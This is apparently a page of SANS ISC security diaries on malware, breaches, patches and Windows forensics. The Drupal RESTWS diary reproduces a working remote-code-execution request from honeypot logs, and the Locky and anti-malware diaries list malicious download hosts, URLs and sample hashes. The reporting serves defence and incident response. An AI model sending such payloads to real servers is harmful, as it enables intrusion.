Did you define your TI requirements? What approach did you use? Please share your experience.

Happy Hunting,

Pasquale

 

References and Suggested Readings
[1] – Scott J. Roberts, "CTI SquadGoals - Setting Requirements", https://sroberts.github.io/2016/03/30/cti-squad-goals-intro-to-requirements/
[2] – CIA, "A Fresh Look at Collection Requirements", https://www.cia.gov/library/center-for-the-study-of-intelligence/kent-csi/vol4no4/html/v04i4a03p_0001.htm
[3] – Scott J. Roberts, "Intelligence Collection Priorities", https://sroberts.github.io/2016/07/26/intelligence-collection-priorities

 

0 Comments

Published: 2016-09-24

.PUB Analysis

Xavier reported a maldoc campaign using Microsoft Publisher files. These files can be analyzed just like malicious Word files.

oledump.py reveals VBA macros in this sample:

The VBA macro contains calls to the chr function. This could encode a URL or some other payload:

If you want more details, I made this video.

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

1 Comments

Published: 2016-09-22

YAHDD! (Yet another HUGE data Breach!)

It looks like Yahoo! is the latest victim of a large scale data breach.  It looks like the released data dates back to at least 2014 and contains more than 500 Million user accounts, so if you haven't changed your Yahoo! password in the last couple of years then it is time.

As one of the other ISC Handlers pointed out...not all Yahoo! customers may know they are Yahoo! customers. Yahoo! white labels email services on behalf of ISPs and email providers. I assume those white label providers will need to do notifications to their customers as well?

-- Rick Wanner MSISE - rwanner at isc dot sans dot edu - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)

0 Comments

Published: 2016-09-22

The era of big DDOS?

I have been tracking DDOS's for a number of years, and quite frankly, it has become boring.  Don't get me wrong, I am not complaining, just stating a fact.  A number of factors seem to have contributed to its fall from mainstream consciousness.  Some of these factors being; somewhat better filtering practices, more awareness of timely patching, and probably the most significant being the novelty has worn off.  Occasionally I will still see a multi-Gbps DDOS, but mostly it has been relegated to booter traffic which is not even a nuisance for most providers.

Over the last few days though there have been two very significant DDOS events.  Firstly, on Tuesday, Sep 20, hosting company OVH was hit with DDOS which peaked near  the 1Tbps range, and also on Tuesday evening (Sep 20), InfoSec journalist Brian Krebs website was hit with a DDOS peaking at over 600 Gbps. 

These are believed to be the two largest DDOS on record and significantly exceed what it was believed could be achieved by any one DDOS group.

While the nature of the DDOS attack traffic used against OVH has not been revealed, the attack against Brian Kreb's site is unusual in that the traffic is not your typical reflective UDP DDOS traffic, but rather TCP traffic that made connections with the web server and GRE (generic routing encapsulation) packets.  The reason why this is unusual is that this traffic cannot be spoofed, but rather an analysis of the traffic should reveal which devices were used to launch the attack.

Is this a sign that big DDOS is making a comeback or just a couple of isolated attacks?

 

UPDATE: It appears Akamai is not happy with the extra excitement hosting Brian Kreb's site is bringing them.  Brian is looking for a new hosting provider.

-- Rick Wanner MSISE - rwanner at isc dot sans dot edu - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)

6 Comments

Published: 2016-09-22

OpenSSL Update Released

As announced earlier this week, OpenSSL released an update today for all currently supported versions (1.0.1, 1.0.2, 1.1.0).

The update fixes 14 different vulnerabilities. Only one vulnerability is rated "High". This vulnerability, CVE-2016-6304, can lead to memory exhaustion and a denial of service if the client sends multiple large OCSP requests.

With this update, the latest versions of OpenSSL for the various branches are 1.0.1u, 1.0.2i and 1.1.0a. All three branches are currently supported.

The table below shows which vulnerabilities apply to each branch.

CVE Description Rating 1.0.1 1.0.2 1.1.0
%%cve:2016-6304%% OCSP Status Request extension unbounded memory growth High x x x
%%cve:2016-6305%% SSL_peek() hang on empty record (CVE-2016-6305) Moderate     x
%%cve:2016-2183%% SWEET32 Mitigation (CVE-2016-2183) Low x x  
%%cve:2016-6303%% OOB write in MDC2_Update() Low x x  
%%cve:2016-6302%% Malformed SHA512 ticket DoS Low x x  
%%cve:2016-2182%% OOB write in BN_bn2dec() Low x x  
%%cve:2016-2180%% OOB read in TS_OBJ_print_bio() (CVE-2016-2180) Low x x  
%%cve:2016-2177%% Pointer arithmetic undefined behaviour (CVE-2016-2177) Low x x  
%%cve:2016-2178%% Constant time flag not preserved in DSA signing Low x x  
%%cve:2016-2179%% DTLS buffered message DoS Low x x  
%%cve:2016-2181%% DTLS replay protection DoS Low x x  
%%cve:2016-6306%% Certificate message OOB reads Low x x  
%%cve:2016-6307%% Excessive allocation of memory in tls_get_message_header() Low     x
%%cve:2016-6308%% Excessive allocation of memory in dtls1_preprocess_fragment() Low     x

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

 

2 Comments

Published: 2016-09-21

Those never-ending waves of Locky malspam

Introduction

Malicious spam (malspam) campaigns sending Locky ransomware are nothing new.  We see reports of it on a near daily basis [1, 2].  But last month, Locky ransomware changed.  It used to be downloaded as an executable file, but now it's being implemented as a DLL [3].  I looked into Locky earlier this month and reported some data on my personal blog [4].  As common as Locky malspam is, I think this near-daily phenomenon deserves another round of investigation.

For this dairy, I reviewed 20 samples of Locky malspam found on Tuesday 2016-09-20.  The image below shows samples of the various senders and subject lines.

The emails


Shown above:  Various senders and subject lines from Locky malspam on Tuesday, 2016-09-20.

The malspam all contained zip archives as file attachments.  Those zip archives contained either a .js file or a .wsf file.  The .js files contain JavaScript and can be run with Windows Script Host by double-clicking the file.  The .wsf file extension is used for a Windows Script File.  These .wsf files can also be run by double-clicking on them in a Windows environment.

These .js and .wsf files are designed to download Locky and run the ransomware as a DLL.


Shown above:  The attachments, extracted files, and associated Locky ransomware DLLs.

Screenshots of the emails

The malicious script files

We can examine the script files after extracting them from the zip archives attached to the emails.  The .js files and the .wsf files may use different formats and syntax, but they are both highly-obfuscated, and they are both designed to download and install the Locky ransomware.


Shown above:  Extracted .js file from one of the attachments.


Shown above:  Extracted .wsf file from one of the attachments.

Chain of events

All 20 samples are designed to infect computers with Locky ransomware, but there are some differences.  I saw the same chain of events with with all the .js files.  But I saw a different chain of events with the .wsf files.

The biggest difference?  Locky samples downloaded by the .js files generated post-infection callback traffic.  Locky samples from the .wsf files did not.


Shown above:  Chain of events from the different types of malicious script files.

Traffic

Traffic is still typical of Locky infection from malspam.  In traffic generated by the .js files, I saw a single Locky download followed by post-infection callback traffic.  In traffic from the .wsf files, I saw three downloads of Locky without any post-infection traffic.  In both cases, the Windows host still provided the typical indicators of a Locky infection.


Shown above:  An example of traffic generated by a .js file.


Shown above:  An example of traffic generated by a .wsf file.


Shown above:  An infected Windows host from either type of malicious script (.js or .wsf).

Both types of malicious script file download Locky as an encrypted or obfuscated binary from a web server, then it's decrypted on the local host.


Shown above:  The encrypted Locky binary downloaded from a web server.


Shown above:  Downloaded binary and decoded Locky DLL on the local host.

Indicators of compromise (IOCs)

The first batch of .js files from Locky malspam with the subject line "Tracking data" generated the following traffic: 

Locky download:

  • 95.173.164.205 port 80 - vetchsoda.org - GET /5pnqv2
  • 178.212.131.10 port 80 - solenapeak.com - GET /2zg3kl
  • 178.212.131.10 port 80 - solenapeak.com - GET /fs3e3a
  • 178.212.131.10 port 80 - solenapeak.com - GET /ha4n2

Post-infection callback:

  • 46.38.52.225 port 80 - 46.38.52.225 - POST /data/info.php

By the time I checked the first two batches of .wsf files from Locky malspam, I didn't get any HTTP traffic.  However, these .wsf files changed victim's preferred DNS server to 167.114.34.61 and generated DNS queries for the following domains:

  • 167.114.34.61 port 53 - DNS query for writewile.su (response: Server failure)
  • 167.114.34.61 port 53 - DNS query for steyjixie.net (response: Server failure)
  • 167.114.34.61 port 53 - DNS query for wellyzimme.com (response: Server failure)

The second batch of .js files from Locky malspam with the subject line "Out of stock" generated the following traffic: 

Locky download:

  • 5.173.164.205 port 80 - musguhefty.com - GET /6lj76w3l
  • 178.212.131.10 port 80 - musguhefty.com - GET /oi3zsb
  • 178.212.131.10 port 80 - nawabmyops.net - GET /bubs031
  • 178.212.131.10 port 80 - vumdaze.com - GET /pknjo995
  • 178.212.131.10 port 80 - vumdaze.com - GET /t98uo
  • 178.212.131.10 port 80 - youthmaida.net - GET /1ly8w
  • 178.212.131.10 port 80 - youthmaida.net - GET /1p6zoyym

Post-infection callback:

  • 46.38.52.225 port 80 - 46.38.52.225 - POST /data/info.php
  • 109.248.59.80 port 80 - 109.248.59.80 - POST /data/info.php

The last batch of .wsf files came from Locky malspam disguised as a receipt from The Music Zoo.  Unlike the first two batches of .wsf files, these caused a proper Locky infection, but they didn't generate any Locky post-infection traffic.  Like the earlier .wsf files, this batch changed victim's preferred DNS server to 167.114.34.61 and used that for any DNS queries.  Examples of traffic from these .wsf files are:

  • 193.150.247.12 port 80 - awaftaxled.com - GET /JHG67g32udi?IBypSwb=miWInrqwLkn
  • 62.84.69.75 port 80 - uphershoji.net - GET /JHG67g32udi?IBypSwb=miWInrqwLkn
  • 193.150.247.12 port 80 - thokelieu.com - GET /JHG67g32udi?IBypSwb=miWInrqwLkn
  • 193.150.247.12 port 80 - awaftaxled.com - GET /bcreubf321?KvbGPrwmwE=TqlgljDymXM
  • 193.150.247.12 port 80 - uphershoji.net - GET /bcreubf321?KvbGPrwmwE=TqlgljDymXM
  • 62.84.69.75 port 80 - thokelieu.com - GET /bcreubf321?KvbGPrwmwE=TqlgljDymXM
  • 193.150.247.12 port 80 - awaftaxled.com - GET /bcreubf321?GPuCciWnxG=PIMPMIBd
  • 193.150.247.12 port 80 - uphershoji.net - GET /bcreubf321?GPuCciWnxG=PIMPMIBd
  • 62.84.69.75 port 80 - thokelieu.com - GET /bcreubf321?GPuCciWnxG=PIMPMIBd
  • 193.150.247.12 port 80 - awaftaxled.com - GET /bcreubf321?luVkLlTEgMf=IBOiJDl
  • 193.150.247.12 port 80 - uphershoji.net - GET /bcreubf321?luVkLlTEgMf=IBOiJDl
  • 193.150.247.12 port 80 - thokelieu.com - GET /bcreubf321?luVkLlTEgMf=IBOiJDl

The infected host

Locky caused by this malspam is the Zepto variant.  All the encrypted files have the .zepto file extension.


Shown above:  Encrypted files with the .zepto file extension.

 

Checking the decryptor page through the Tor network, you'll find the standard Locky description.  The ransom payment is 3 bitcoins, which is approximately 1,800 US dollars.


Shown above:  The Locky decryptor page.


Shown above:  Ransom stated as 3 bitcoins.

Final words

Ransomware like Locky continues to be a well-known threat.  Fortunately these waves of malspam are usually blocked for most organizations using any decent email security and spam filtering.  Furthermore, properly-administered Windows hosts are not likely to be infected.

So why examine these emails?

Because some of these emails make it through, and people still get infected.  All it takes is one message, one Windows host without enough protective measures, and one person willing to start clicking away.

A solid strategy for any sort of ransomware is to make regular backups of any important files.  Remember to test those backups, so you're certain to recover your data.

Pcap and malware for this diary are located here.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

References:

[1] http://blog.dynamoo.com/search/label/Locky/
[2] https://myonlinesecurity.co.uk/tag/locky/
[3] http://www.bleepingcomputer.com/news/security/locky-zepto-ransomware-now-being-installed-from-a-dll/
[4] http://malware-traffic-analysis.net/2016/09/12/index.html

1 Comments

Published: 2016-09-20

Windows Events log for IR/Forensics ,Part 2

In a previous diary[i] I talked about Windows Events and I gave some examples about some of the most useful events for Forensics/IR. In this diary I will talk about how to use Windows PowerShell to search for events

Get-WinEvent

“The Get-WinEvent cmdlet gets events from event logs, including classic logs, such as the System and Application logs, and the event logs that are generated by the Windows Event Log technology introduced in Windows Vista. It also gets events in log files generated by Event Tracing for Windows (ETW).”[ii]

 

 

And here is some examples

Get-winevent -logname System

 

This command would show everything that in the System events which might be very large and it will show many things that might be not important to our case.

The best way to filter events in get-winevent cmdlet is filterhashtable parameter, Suppose that you are interested only to see the events that’s related to a new service createion (event id 7045 )

Get-WinEvent -FilterHashtable @{logname='system' ; id=7045} | format-list

 

And output would be similar to this

TimeCreated  : 9/16/2016 12:57:58 AM

ProviderName : Service Control Manager

Id           : 7045

Message      : A service was installed in the system.

 

               Service Name:  Meterpreter

               Service File Name:  "C:\Windows\TEMP\hXdIEXeEbqqzDy\metsvc.exe" service

               Service Type:  user mode service

               Service Start Type:  auto start

               Service Account:  LocalSystem

 

TimeCreated  : 9/16/2016 12:56:46 AM

ProviderName : Service Control Manager

Id           : 7045

Message      : A service was installed in the system.

 

               Service Name:  vvgQjBPVHmgKnFfH

               Service File Name:  %SYSTEMROOT%\AmEAdtHt.exe

               Service Type:  user mode service

               Service Start Type:  demand start

               Service Account:  LocalSystem

 

TimeCreated  : 9/16/2016 12:54:14 AM

ProviderName : Service Control Manager

Id           : 7045

Message      : A service was installed in the system.

 

               Service Name:  jJZzbNmqBqTeqzsU

               Service File Name:  %SYSTEMROOT%\bFZwMEQv.exe

               Service Type:  user mode service

               Service Start Type:  demand start

               Service Account:  LocalSystem

 

TimeCreated  : 9/16/2016 12:39:34 AM

ProviderName : Service Control Manager

Id           : 7045

Message      : A service was installed in the system.

 

               Service Name:  zNvHlQahvTqmPpVS

               Service File Name:  %SYSTEMROOT%\cEYBVJNP.exe

               Service Type:  user mode service

               Service Start Type:  demand start

               Service Account:  LocalSystem

 

TimeCreated  : 9/15/2016 9:09:40 PM

ProviderName : Service Control Manager

Id           : 7045

Message      : A service was installed in the system.

 

               Service Name:  vJcYxfCDYUgOZiVb

               Service File Name:  %SYSTEMROOT%\TifTyNVa.exe

               Service Type:  user mode service

               Service Start Type:  demand start

               Service Account:  LocalSystem

 

 

As you can see from the sample the are many services with suspicious name has been installed in the system.

Again we can check our events to see who was logged around that time

Get-WinEvent -FilterHashtable @{logname='security' ; id=4624;starttime=’ 9/15/2016 9:00:00 PM ‘;endtime=’ 9/15/2016 9:09:40 PM’} |

 

And here is the output

TimeCreated  : 9/15/2016 9:09:39 PM

ProviderName : Microsoft-Windows-Security-Auditing

Id           : 4624

Message      : An account was successfully logged on.

 

               Subject:

                   Security ID:        S-1-0-0

                   Account Name:        -

                   Account Domain:        -

                   Logon ID:        0x0

 

               Logon Type:            3

 

               New Logon:

                   Security ID:        S-1-5-21-574956201-2274518538-2668157362-1004

                   Account Name:        test

                   Account Domain:        WIN-CAR8AFQU4IJ

                   Logon ID:        0x112fd1

                   Logon GUID:        {00000000-0000-0000-0000-000000000000}

 

               Process Information:

                   Process ID:        0x0

                   Process Name:        -

 

               Network Information:

                   Workstation Name:    BH5vQpSXNj4EBCBk

                   Source Network Address:    10.10.75.1

                   Source Port:        55165

 

               Detailed Authentication Information:

                   Logon Process:        NtLmSsp

                   Authentication Package:    NTLM

                   Transited Services:    -

                   Package Name (NTLM only):    NTLM V2

                   Key Length:        0

 

From the above output we find out that , there was a user name “test” was logged on at : 9/15/2016 9:09:39 PM via network (Logon Type : 3) and from the IP address 10.10.75.1 .

Now let’s find out when the user “test” was created:

Get-WinEvent -FilterHashtable @{logname='Security' ; ID=4720} | where {$_.message -match "test"} | fl

 

And here is the output

 

TimeCreated  : 8/12/2016 10:06:33 PM

ProviderName : Microsoft-Windows-Security-Auditing

Id           : 4720

Message      : A user account was created.

              

               Subject:

                   Security ID:        S-1-5-21-574956201-2274518538-2668157362-1000

                   Account Name:        Victim

                   Account Domain:        WIN-CAR8AFQU4IJ

                   Logon ID:        0x275eb2

              

               New Account:

                   Security ID:        S-1-5-21-574956201-2274518538-2668157362-1004

                   Account Name:        test

                   Account Domain:        WIN-CAR8AFQU4IJ

              

               Attributes:

                   SAM Account Name:    test

                   Display Name:       

                   User Principal Name:    -

                   Home Directory:       

                   Home Drive:       

                   Script Path:       

                   Profile Path:       

                   User Workstations:   

                   Password Last Set:   

                   Account Expires:        

                   Primary Group ID:    513

                   Allowed To Delegate To:    -

                   Old UAC Value:        0x0

                   New UAC Value:        0x15

                   User Account Control:   

                       Account Disabled

                       'Password Not Required' - Enabled

                       'Normal Account' - Enabled

                   User Parameters:   

                   SID History:        -

                   Logon Hours:        All

              

               Additional Information:

                   Privileges        -

 

Now lets see if there is any other logon attemps via network ,for this task I would use get-eventlog

Get-EventLog -LogName security | where {$_.eventid -eq 4624} | where {$_.replacementstrings[8] -eq 3} | select timegenerated ,@{Name='AccountName';Expression={$_.replacementstrings[5]}},@{Name='IP Address';Expression={$_.replacementstrings[-2]}} | export-csv c:\users\user\type3logon.csv

Get-eventlog store the logon type in a array called replacementstrings , its stored at location [8] the logon type , user name at location 5 and the IP Address in location [-2]

Now lets see what other logon types we have and how many attempts for each

Get-EventLog -LogName security | where {$_.EventID -eq 4624} | Group-Object {$_.Replacementstrings[8]} | select name,count

 

Name                Count

---------               ---------

7                              2

5                            210

2                              29

 

 

 

[i] https://isc.sans.edu/forums/diary/Windows+Events+log+for+IRForensics+Part+1/21493/

1 Comments

Published: 2016-09-19

Does it Matter If You Cover Your Webcam?

During security conferences, laptops with tape covering the webcam has certainly been a common sight. But recently, covering webcams has become somewhat of a "main-stream phenomenon", after Mark Zuckerberg was sighted with a covered webcam [1], and even the FBI director suggests people covering their cameras [2]. 

Laptops are often used in private spaces, and an attacker, with access to the camera, is expected to be able to spy on the user of the laptop. Attacks like this have happened, and even indicator lights can be disabled in some of these attacks. However, the camera is not the only sensor included in modern laptops and mobile devices that can be used to "listen in." Most notably, mobile devices usually have several microphones, that are far more difficult to disable. The article about Mark Zuckerberg above shows how he also uses tape to cover up the microphone of the laptop. First of all, covering the microphone with electrical tape will not reduce the microphone's ability to detect sound by much. Secondly, most laptops use multiple microphones. Disabling all microphones is difficult, and will most likely void your warranty if you outright remove them.

The webcam in most laptops is designed for video conferencing. As a result, it points at the user's face, not at the keyboard, which would likely be more interesting. I have not seen a built in "tilt pan" camera yet. The resolution is also somewhat limited (1080p usually) and prevents the camera from seeing notes taped to a wall behind it. Access to the microphone (and of course to the keyboard via a good old fashion keystroke logger) can be a lot more useful.

Many mobile devices do use gyroscopes to detect motion. In some cases, these sensors were found to be sensitive enough to record conversations by detecting the vibration caused by sound. Microphones in close by mobile devices have also been found to be sensitive enough to record keystrokes on close by PC keyboards. 

As far as cameras go, cameras in video conferencing systems, which often include pan/tilt and zoom have been used to look in on conference rooms. These cameras are often not covered up.

So what should you do?

- Keep your camera covered. There are some little "sliding covers" that you can buy, but a piece of electrical tape will work (add some paper to the back of it right over the camera to avoid glue residue in case you use it).
- In particular for sliding covers, make sure the frame doesn't cover the LED indicator. You should be able to see if the camera is on while the cover is open
- For systems like video conferencing cameras, point them in a safe direction (wall) while not in use
- Sadly, I haven't seen laptops with physical switches for microphones. If you cover microphones, make sure you test that the cover works (maybe some foam will work) and get the schematic for your laptop to know where all the microphones are located.
- Don't forget your mobile devices! 
- and if you want real privacy: Leave the electronics in a different room and power it down.

Any other tips I missed?

[1] http://www.theverge.com/2016/6/21/11995032/mark-zuckerberg-webcam-tape-photo
[2] http://thehill.com/policy/national-security/295933-fbi-director-cover-up-your-webcam

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

9 Comments

Published: 2016-09-18

Windows Events log for IR/Forensics ,Part 1

In the time of incidents, Windows Event logs provide a plenty of useful information for the Incident responder.As you know Windows can generate thousands of events in few minutes ,in this diary I will talk about some of the most useful events and in the next diary I would discuss how to use PowerShell to search for them .

Here is of the most useful events for Forensics/Incident response:

Event ID

Description

Log Name

4624

Successful Logon

Security

4625

Failed Login

Security

4776

Successful /Failed Account Authentication

Security

4720

A user account was created

Security

4732

A member was added to a

security-enabled local group

Security

4728

A member was added to a security-enabled global group

Security

7030

Service Creation Errors

System

7045

Service Creation

System

 

 

One of the useful information that Successful/Failed Logon event provide is how the user/process tried to logon  (Logon Type ) but Windows display this information as a number and here is a list of the logon type and their explanation

Logon Type

Explanation

2

Logon via console

3

Network Logon, A user or computer logged on to this computer from the network.

4

Batch logon

5

Windows Service Logon

7

Credentials used to unlock screen

8

Network logon sending credentials (cleartext)

9

Different credentials used than logged on user

10

Remote interactive logon (RDP)

11

Cached credentials used to logon

12

Cached remote interactive

13

Cached unlock (Similar to logon type 7)

 

In the next diary I would show some examples how to use PowerShell  to search Windows Events of a compromised system 

 

 

3 Comments

Published: 2016-09-17

Multiple Cisco Products affected by IKEv1 Vulnerability

Cisco released a an advisory (CVE-2016-6415) regarding a vulnerability in IKEv1 that affect Cisco IOS, IOS XE and IOS XR software which could allow an unauthenticated malicious user to retrieve memory content leading to disclosure of confidential information

Note: "Cisco will release software updates that address this vulnerability. There are no workarounds that address this vulnerability."[1] The list of affected products is available here. This vulnerability is rated High by Cisco.

[1] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160916-ikev1

-----------
Guy Bruneau IPSS Inc.
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

6 Comments

Published: 2016-09-15

In Need of a OTP Manager Soon?

Even if everybody agrees to say that passwords are a weak way to protect access to sensitive or private information, they remain still today the default method implemented by many online services. A password, as complex as it may be, is easy to steal or leak. Tools like Mimikatz or memory scrappers[1] are common today. For a while, major players on the Internet started to implement two-factors authentication (2FA) or multi-factors authentication (MFA). Just to remind you, this authentication mechanism is based on a combination of:
- something "you know" (a password, a PIN or pass phrase)
- something "you have" (a token, a smart card)
- something "you are" (your fingerprint, retina, hand palm, …)

From a cost and ease of implementation point of view, the most common combination remains a password and a temporary code or "OTP". They are commercial solutions based on physical tokens but today with the explosion of smartphones, the Google Authenticator[2] and compatible applications became the most used platform. Once the application is installed, every time you activate the OTP feature on a compatible website, you scan a QR code and that’s it!
An alternative way (not available on all sites) is to use the Base32 or HEX key like on the ISC website:

When available, I always enable OTP on my online accounts (Twitter, Github, Apple, Dropbox, … but also on my own resources like my blog or my private ownCloud). On my iPhone, I’m using the 2FA app because it has a simple GUI and it provides an Apple watch version (It is so convenient to have tokens just on your wrist!). But my collection of tokens is constantly growing:

I can’t imagine losing all those tokens! We use password managers for a while (well, I hope you do) but will we need a “OTP Manager” soon? The other question is: How to safely keep track and backup your tokens? They are available in your pocket but a smartphone is easy to loose, to be stolen or broken. Most websites propose a procedure to recover your access if you lost your token but there isn't a unique procedure: Some propose recovery codes (that must also be safely stored somewhere), emails or SMS code (and, guess what, usually the same phone is used to receive the recovery SMS).

Here are some best practices:

  • Always read carefully the recovery procedure
  • Copy / print backup codes
  • Link your account to a mobile phone (to receive SMS)
  • Link your account to a valid and rock-solid email address (not the one provided by your employer)

Personally, what I do:

  • When the QR code is displayed on the website, I take a screenshot of the code and rename the picture QR_websitename_.png
  • When the Base32 or HEX key is provided, I write them in a text file KEY_websitename.txt
  • Files are zipped, encrypted with my PGP key and stored offline
  • Link the account to a different SIM / phone number that can be used in any old-fashioned phone

Note that some 2FA apps, like Authy, propose a backup solution (usually in the cloud - it's up to you to trust it or not). To conclude, OTP passwords are a good way to protect your accounts but have a good recovery procedure to avoid losing control of your accounts. And you? What how to you address this issue? Share your input!

[1] https://blog.blechschmidt.saarland/memory-recovery/
[2] https://support.google.com/accounts/answer/1066447

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

5 Comments

Published: 2016-09-15

Is "2 out of 3" good enough for Anti-Malware?

One of my morning rituals is to take the last few malware samples I received in any of my inboxes and run them in a virtual machine to see if there is anything new. To be honest: There isn't much new that we haven't already written about. The sample is usually a zipped VBScript file that will download and run ransomware. But that isn't the only constant. The other constant is the inability of anti-malware to protect your system from these consistent attacks.

The virtual machine runs a fully patched Windows 10 install, and home-user grade anti-malware. I would consider it a "well configured" average home user system.

This morning, for example, I tried these three samples:

924936fb9f562dc08556bf0677a5d15c813eebde  SCAN_20160915_241418570.zip
c29dd0d1fe36b3891d685171683635c442d84c8d  SCAN_20160915_3640961765775.zip
6213e371567b4620064933efa43e5ffdba455c65  SCAN_20160915_894622558880029.zip

They all arrived in similar emails with a subject of "SCAN" . 

If you are paying attention of malware, you probably have seen e-mails like this for years with various attachments.

Two of these samples were nicely detected by my anti-malware solution, and I wasn't even able to copy them to my virtual machine. But the third one, which isn't substantially different, made it past whatever signature was used to detect these generic JavaScript downloaders.

Virustotal shows that some name-brand anti-malware solutions do not detect this particular sample:

https://www.virustotal.com/en/file/8acb71453b9759a64eea060949ad87bae3d6f070b04daf2f70ed124b1a905399/analysis/
https://www.virustotal.com/en/file/f732887b200563bfdd89f516fc30139ea21e8adbd3280df3436c289bc154383a/analysis/
https://www.virustotal.com/en/file/a9b4a38e515ee10e1dc8eda13ac9abd8c11c0eece4ac1cb1c746015d17ff5a0c/analysis/

It also shows that all of these samples were rather "fresh" in that Virustotal had received them about 30 minutes ago, so around the time I had received them.

Even if your anti-malware solution doesn't detect the downloader, there is still a chance that it will detect the malware that is downloaded by the JavaScript. This often leads to a false sense of security in that you will see, often multiple times, popups that your anti-malware solution did remove malicious code from your system. But these downloaders can be rather persistent. One sample I looked at yesterday took about 15 minutes, and about a dozen of "malware found" popups, until it finally downloaded a version of Locky that was not detected, and I ended up with another encrypted system.

So what can you do?

  • The less malware reaches the user, the better. Filter as much on mail servers and proxies as you can using generic filters ("zipped VBscripts" and the list. We talked about this before).
  • Once you notice a possible infection, NEVER trust anti-malware to clean your system. It is probably best to shut down the system as soon as you notice "malware found" popups. This way, you MAY prevent the final successful install, and you may be able to save some of your files from being encrypted.
  • Just like you should not rely on anti-malware: Blocklists of bad URLs and the like are just as bad (ours included). They will help you in hindsight to figure out who got infected yesterday (or an hour ago if they are good), but they will not consistently prevent exploitation.

For example, here are the URLs that I think where used in the undetected sample (I didn't do a full analysis):

(spaces added to protect readers.)

bigfishcasting .com/ afdIJGY8766gyu?YJRTHAigKa=sLUfGQkQRhO
delicefilm .com /afdIJGY8766gyu?YJRTHAigKa=sLUfGQkQRhO (this one has some reasonable recognition as a bad URL)
keratin .sk/ afdIJGY8766gyu?YJRTHAigKa=sLUfGQkQRhO

The issue with anti-malware missing the downloader, and then hoping that the downloaded malware will be detected, isn't new, and going back at least to the famous "WMF" incident more than 10 years ago, when anti-virus was suggested as a mitigation for the vulnerability, even though it didn't detect actual exploitation of the vulnerability but instead only the additional malware downloaded via the exploit. 10+ years later... not much changed.  We are still making it too easy for the bad guys.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

8 Comments

Published: 2016-09-14

Exploit Attempts for Drupal RESTWS .x Module Vulnerability

Attackers usually don't have to worry much about Drupal administrators applying patches. The majority of exploit attempts I see in our honeypots use pretty ancient vulnerabilities. So I was happy to see a script kiddie go the extra mile and use a vulnerability released in July of this year [1] [2].

The vulnerability itself is very straight forward. The attacker can send arbitrary php code that will be executed on the server. No special encoding beyond URL encoding appears to be required.

Here is the exploit string as found in my logs:

GET /?q=taxonomy_vocabulary//passthru/printf+%22printf%5C040%5C047%5C134%5C060%5C066%5C061%5C134%5C061%5C060%5C065%5C134%5C061%5C061%5C066%5C134%5C061%5C061%5C062%5C134%5C061%5C061%5C066%5C134%5C061%5C062%5C060%5C134%5C061%5C060%5C062%5C134%5C061%5C062%5C065%5C134%5C061%5C066%5C062%5C134%5C061%5C062%5C063%5C047%22%7Csh+

Decoding this leads to:

"printf\040\047\134\060\066\061\134\061\060\065\134\061\061\066\134\061\061\062\134\061\061\066\134\061\062\060\134\061\060\062\134\061\062\065\134\061\066\062\134\061\062\063\047"|sh

which is actually "double octal encoded" and would just print the string "1ENJNPBUrS", likely trying to find indicators of vulnerable systems.

So far in our honeypot, I got 44 attempts today from 16 different IPs. Expliot attempts go back to July, just after the vulnerability was announced. Earlier versions use a slightly different test:

GET /?q=taxonomy_vocabulary/XuMWvA8KTq/passthru/echo%20ktKPt14N9p HTTP/1.1

So they skip the octal/URL encoding part.

I used Bing's IP address search to check some of the IP addresses attacking the honeypot (for example, try a Bing search for "ip:117.240.207.43", but don't click on the result. The site is likely compromised). Most of the IPs appear to be running Drupal sites and are likely exploited and used to scan for more victims.

In my quick sampling, I didn't find any obvious malicious content on these sites. I would have expected some advertisement or maybe even malware, but maybe they are still building out their network.

[1] https://www.mehmetince.net/exploit/drupal-restws-module-7x-remote-php-code-execution
[2] https://www.drupal.org/node/2765567

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

0 Comments

Published: 2016-09-13

Microsoft Patch Tuesday Analysis

The Microsoft Patch Tuesday updates are out, our analysis is here:
https://isc.sans.edu/mspatchdays.html?viewday=2016-09-13

If you consume these using an API, the link for that is here:  https://isc.sans.edu/api/getmspatchday/2016-09-13
(or if you prefer json https://isc.sans.edu/api/getmspatchday/2016-09-13?json )

===============
Rob VandenBrink
Compugen

2 Comments

Published: 2016-09-13

Apple iOS 10 and 10.0.1 Released

On top of today being Patch Tuesday, Apple has released IOS 10 sometime today as well.  They also released 10.0.1, with not a lot of detail behind that release (maybe something was missed?)

Security details for 10.0 : https://support.apple.com/en-ca/HT207143
Security details for 10.0.1: https://support.apple.com/en-ca/HT207145 (an almost empty page)

Highlights are:

MiTM attacks on Apple Updates
Autocorrect pulling sensitive data from cache (again)
Issues with Certificate Trust in Mail app allows MiTM
Airprint Temp file sanitization
SMS directory exposed to malicious apps

 

None of these Apple or Microsoft updates are what you'd call "small" - let's hope we don't break the internet today (just kidding, I think).

Happy Patching everyone!

===============

Rob VandenBrink
Compugen

1 Comments

Published: 2016-09-13

If it's Free, YOU are the Product

This is a commonly used phrase, usually when describing free products on the internet (often social media sites).

When my wife asked me to convert a PDF to a DOCX file, I thought I'd test this proverb in a slightly different way.  I googled "convert PDF DOC", and tried the first group of "free" online converters.

Of the ones that are actually free, I took the resultant DOC file and pulled it apart, first just by unzipping it, then in much more detail using some of the tools on Lenny Zeltser's cheat sheet page on analyzing malicious documents: https://zeltser.com/analyzing-malicious-documents/.  At this point I think you know where I'm going.

Yes, 3 of the first 5 on the list converted to doc files that contained <gasp> malware - Angler variants all of them.  So an "older" kit, but an exploit all the same. 

So I guess it's true, you are the product! 

Oh, and my wife's request?  I just opened the PDF in Word 2013 and did a "save as".  Some of the graphics were lost, but everything she needed came through just fine!

===============
Rob VandenBrink
Compugen

5 Comments

Published: 2016-09-11

Getting Ready for macOS Sierra: Upgrade Securely

Downloadable PDF with screen shots

